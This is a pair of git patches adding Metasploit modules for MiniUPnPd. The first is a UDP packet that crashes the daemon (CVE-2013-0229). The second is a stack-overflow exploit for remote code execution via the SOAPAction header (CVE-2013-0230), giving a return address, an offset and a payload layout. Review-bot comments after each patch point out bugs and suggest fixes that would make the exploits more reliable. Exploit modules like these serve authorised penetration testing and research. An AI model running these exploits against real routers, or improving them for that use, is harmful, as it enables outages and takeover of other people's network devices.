From 945dde3389c91536507e14ffc1d0e52a69fbe82c Mon Sep 17 00:00:00 2001
From: Dejan Lukan
Date: Fri, 17 May 2013 13:58:32 +0200
Subject: [PATCH 1/2] Added CVE-2013-0229 for MiniUPnPd < 1.4
---
 modules/exploits/multi/upnp/miniupnpd_dos.rb | 86 ++++++++++++++++++++
 1 file changed, 86 insertions(+)
 create mode 100644 modules/exploits/multi/upnp/miniupnpd_dos.rb
diff --git a/modules/exploits/multi/upnp/miniupnpd_dos.rb b/modules/exploits/multi/upnp/miniupnpd_dos.rb
new file mode 100644
index 0000000000..5d3fc903e2
--- /dev/null
+++ b/modules/exploits/multi/upnp/miniupnpd_dos.rb
@@ -0,0 +1,86 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::Udp
+ include Msf::Auxiliary::Dos
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'MiniUPnPd < 1,4 denial of service (DoS) exploit',
+ 'Description' =>
+ %q{
+ This module allows remote attackers to cause a denial of service in MiniUPnP 1.0
+ server via specifically crafted UDP request. This vulnerability was identified
+ as CVE-2013-0229.
+ },
+ 'Author' => [ 'Dejan Lukan' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision: 9999 $',
+ 'References' => [
+ [ 'CVE', '2013-0229' ],
+ [ 'OSVDB', '89625' ],
+ ],
+ 'DisclosureData' => 'Mar 27 2013',
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(1900),
+ ], self.class)
+ end
+
+ def run
+ # connect to the UDP port
+ connect_udp
+
+ # the M-SEARCH packet that is being read line by line: there shouldn't be CRLF after the
+ # ST line
+ sploit = "M-SEARCH * HTTP/1.1\r\n"\
+ "HOST: 239.255.255.250:1900\r\n"\
+ "ST:uuid:schemas:device:MX:3"
+
+ # the packet can be at most 1500 bytes long, so add appropriate number of ' ' or '\t'
+ # this makes the DoS exploit more probable, since we're occupying the stack with arbitrary
+ # characters: there's more chance that the the program will run off the stack.
+ sploit += ' '*(1500-sploit.length)
+
+ # send the exploit to the target
+ print_status("Sending malformed packet to #{rhost}...")
+ udp_sock.put(sploit)
+
+ # disconnect from the server
+ print_status("The target should be unresponsive now...")
+ disconnect_udp
+ end
+end
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
From a47b69c71a3ec821ce5086e92ba92ba1fe4fd293 Mon Sep 17 00:00:00 2001
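Review bot: The new file is placed under `modules/exploits/multi/upnp/` although the class is an `Msf::Auxiliary` with `Msf::Auxiliary::Dos` mixed in; as far as I know the framework derives a module's type from its directory, so it should live under `modules/auxiliary/dos/upnp/` to be loaded as an auxiliary module. The metadata also has `'DisclosureData' => 'Mar 27 2013'`, which should be `'DisclosureDate'` (the misspelled key is presumably just ignored, leaving the module without a disclosure date), and `'Name' => 'MiniUPnPd < 1,4 denial of service (DoS) exploit'` should read `< 1.4`, with the description's "MiniUPnP 1.0" reconciled with that range. The comment above the padding talks about "occupying the stack" and the program "running off the stack", whereas CVE-2013-0229 is publicly described as a buffer over-read in the SSDP request handler; if the padding exists to fill the receive buffer so the unterminated ST line is scanned past its end, the comment should say so, e.g. `# pad to the 1500-byte receive buffer so the unterminated ST line is read past the end of the buffer`. Finally `print_status("The target should be unresponsive now...")` asserts an outcome the module never verifies; consider sending a second M-SEARCH afterwards and reporting only whether a reply came back.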
From: Dejan Lukan
Date: Fri, 17 May 2013 14:17:38 +0200
Subject: [PATCH 2/2] Added CVE-2013-0230 for MiniUPnPd 1.0 stack overflow vulnerability
---
 .../upnp/miniupnpd_stack_overflow_1.0.rb | 156 ++++++++++++++++++
 1 file changed, 156 insertions(+)
 create mode 100644 modules/exploits/multi/upnp/miniupnpd_stack_overflow_1.0.rb
diff --git a/modules/exploits/multi/upnp/miniupnpd_stack_overflow_1.0.rb b/modules/exploits/multi/upnp/miniupnpd_stack_overflow_1.0.rb
new file mode 100644
index 0000000000..329317f3f6
--- /dev/null
+++ b/modules/exploits/multi/upnp/miniupnpd_stack_overflow_1.0.rb
@@ -0,0 +1,156 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'MiniUPnPd 1.0 stack overflow remote code execution',
+ 'Description' =>
+ %q{
+ This module exploits the MiniUPnP 1.0 SOAP stack overflow vulnerability present
+ in the SOAPAction HTTP header. This vulnerability was identified as CVE-2013-0230.
+ },
+ 'Author' => [ 'Dejan Lukan' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision: 9999 $',
+ 'DefaultOptions' => { 'EXITFUNC' => 'process', },
+ # the byte '\x22' is the '"' character and the miniupnpd scans for that character in the
+ # input, which is why it can't be part of the shellcode (otherwise the vulnerable part
+ # of the program is never reached)
+ 'Payload' => { 'Space' => 2060, 'BadChars' => "\x00\x22", 'DisableNops' => true },
+ 'Platform' => 'linux',
+ 'References' => [
+ [ 'CVE', '2013-0230' ],
+ [ 'OSVDB', '89624' ],
+ ],
+ 'Targets' =>
+ [
+ #['Debian GNU/Linux 4.0', { 'Ret' => 0x0804c334, 'Offset' => 2123 }],
+ ['Debian GNU/Linux 6.0', { 'Ret' => 0x0804ee43, 'Offset' => 2123 }],
+ ],
+ 'DefaultTarget' => 0,
+ 'Privileged' => false,
+ 'DisclosureData' => 'Mar 27 2013',
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(5555),
+ ], self.class)
+ end
+
+
+ def check
+ packet = "M-SEARCH * HTTP/1.1\r\n \
+ HOST: 239.255.255.250:1900\r\n \
+ ST: ssdp:all\r\n \
+ MX:2\r\n \
+ MAN:\"ssdp:discover\"\r\n"
+ end
+
+
+ def exploit
+ #
+ # Build the SOAP Exploit
+ #
+ # jmp 0x2d ; jump forward 0x2d bytes (jump right after the '#' char)
+ sploit = "\xeb\x2d"
+
+ # a valid action
+ sploit += "n:schemas-upnp-org:service:WANIPConnection:1#"
+
+ # payload
+ sploit += payload.encoded
+
+ # nops + #sploit += "\x90"*(target['Offset'] - sploit.length - 16) + sploit += rand_text(target['Offset'] - sploit.length - 16) + + # overwrite registers on stack + sploit += "\x41\x41\x41\x41" # overwrite EBX + sploit += "\x42\x42\x42\x42" # overwrite ESI + sploit += "\x43\x43\x43\x43" # overwrite EDI + sploit += "\x44\x44\x44\x44" # overwrite EBP + + # Overwrite EIP with addresss of "pop ebp, ret", because the second value on the + # stack points directly to the string after 'Soapaction: ', which is why we must + # throw the first value on the stack away, which we're doing with the pop ebp + # instruction. Then we're returning to the next value on the stack, which is + # exactly the address that we want. + sploit += [target.ret].pack('V') + + # the ending " character is necessary for the vulnerability to be reached + sploit += "\"" + + # data sent in the POST body + data = + "\r\n" + + "\r\n" + + "\r\n" + + "\r\n" + + "\r\n" + + "\r\n" + + "\r\n" + + + # + # Build and send the HTTP request + # + print_status("Sending exploit to victim #{target.name} at ...") + send_request_raw({ + 'uri' => target_uri.path, + 'method' => 'POST', + 'headers' => { + 'SOAPAction' => sploit, + #'User-Agent' => 'Python-urllib/2.7', + #'Connection' => 'close', + #'Content-Type' => 'application/x-www-form-urlencoded', + }, + 'data' => data, + }, 25) + + + # handle the exploit + handler + + # disconnect from the server + disconnect + end +end + + + + + + + + + + + + + + + + + + + + + + +
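Review bot: The filler in `exploit`, `sploit += rand_text(target['Offset'] - sploit.length - 16)`, is generated without the module's bad characters, so it can emit the 0x22 and 0x00 bytes that the comment above `'Payload'` says must never reach the SOAPAction value, plus CR/LF, which terminates the header line; pass them through, e.g. `sploit += rand_text(target['Offset'] - sploit.length - 16, payload_badchars)`, or use `rand_text_alphanumeric`. For the same reason `'BadChars' => "\x00\x22"` should also list `\x0d\x0a`, since the encoded payload is embedded in an HTTP header. `check` builds an SSDP M-SEARCH in `packet` but never sends it and returns that String instead of an `Exploit::CheckCode`, so it is a no-op that will mislead anyone running `check`; either drop it or issue a request through the HttpClient mixin and return a `CheckCode` based on the response (an SSDP probe over UDP would additionally need the Udp mixin, which this module does not include). The `'DisclosureData'` key is again a typo for `'DisclosureDate'`.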